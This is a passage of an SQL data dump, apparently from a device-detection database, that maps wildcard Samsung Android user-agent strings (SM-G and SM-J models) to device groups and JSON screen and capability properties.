Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G610L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G610M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G610S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G611F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G611M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G611MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G615F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G615FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G885F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G8870) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G892A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G892U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G900FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G900M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G900V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G9300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930R6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930R7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G930W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G9350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G935W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G950N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G950W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G9550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G955F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G955N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G955U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G955U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G955W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G9650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G965F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G965U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G965U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G965W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260MU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J260Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J327R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J327R6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J327R7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J327U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J327V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J327VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J327W) AppleWebKit/* (KHTML, like Gecko) Chrome 